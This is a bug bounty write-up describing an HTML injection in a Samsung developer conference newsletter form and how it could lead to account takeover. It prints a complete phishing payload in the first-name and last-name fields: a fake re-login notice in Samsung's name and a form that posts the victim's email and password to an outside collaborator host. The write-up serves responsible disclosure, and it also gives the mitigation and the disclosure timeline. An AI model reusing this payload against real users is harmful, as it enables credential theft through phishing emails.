HTMLI to ATO leads to $$$ bounty 🤑
Hello Hackers, In this writeup I am going to discuss my recent finding on Samsung, like how I found the bug and as a award they awarded me $$$ for my finding. And this was my second bounty and it was my first bounty in dollars 🥳. So let’s deep dive into the vulnerability.
During testing on Samsung, firstly I performed different google dorks.
NOTE: If you want to learn about dorking like shodan, google and more then you can learn it from my best friend and mentor AbhirupKonwar writeups in which he included lots of unique techniques you can use to use during bug hunting.
So, I come up with the subdomain called https://www.samsungdeveloperconference.com/ in which I found a Newsletter subscription in which the user give it’s first name and last name and email to subscribe to newsletter and the page looks like this:
So, to test for HTML injection I simply give my email address and add payloads in to the first name and last name fields and click on subscribe and guess what my payload works and I successfully found HTMLI in Email and to show impact I show them phishing leads to ATO full working poc.
Payload in firstname:
Dear Team
As part of our commitment to security, we have logged you out of your accounts due to recent updates in our system protocols. To ensure the safety and integrity of your account, please re-login using the secure link provided below.
<html>
<body>
<form action="https://burpcolloborator.com">Login again for security:<br><br>
<label for="u">Email id:
<input type="text" id="u" name="u"><br><br>
<label for="p">Password:
<input type="password" id="p" name="p"><br></br>
<input type="submit" value="Submit">
</body>
</html>
Payload in lastname:
If you encounter any issues or have questions, feel free to reach out to our IT support team at. We appreciate your cooperation in keeping our systems secure.
Thank you for your understanding.
Best Regards,
Samsung Developer
<!--The email with malicious payload looks like this:
Now as victim adds the detail like email and password and boom an attacker will easily get victim’s credentials and thus an attacker can takeover victim account and note that the mail come from samsung email address which also increase the trust to victim to enter the credentials.
And after all the reporting samsung team has good response time and they awarded me $$$ bounty 🤑for the report and mark my report as a LOW severity 🤔 I think this should at least P3 or medium severity don’t you think?
Mitigation of HTMLI:
As a mitigation of this bug samsung team make a proper whitelist of the characters and implements proper checks for >,<,.,,,”,’,%, etc this words. which was implement not only client side but they also implemented this in server side checks so that this is totally next to impossible to bypass this bug.
Timeline:
2024-11-13: Reported
2024–11–26: Confirmed the bug was valid
2024–12–13: I told them that fix was already deployed and ask for updates
2024–12–18: They confirm that the fix was deployed and marked the severity as LOW
2025–01–06: Assure me that the bugcrowd team will contact me soon and decided to award me $$$ 🤑
2025–01–11: Asked to recheck the severity and suggest to increase it to P3.
2025–01–16: They denied to increase the severity.
2025–02–17: Awarded my very first bounty in $$$ 🥳
You can read my other articles:
I hope you found this writeup helpful and you also motivate to hunt for more and the consistency, persistence is the main key in this field. I will see you in amazing one. Till then bye 👋
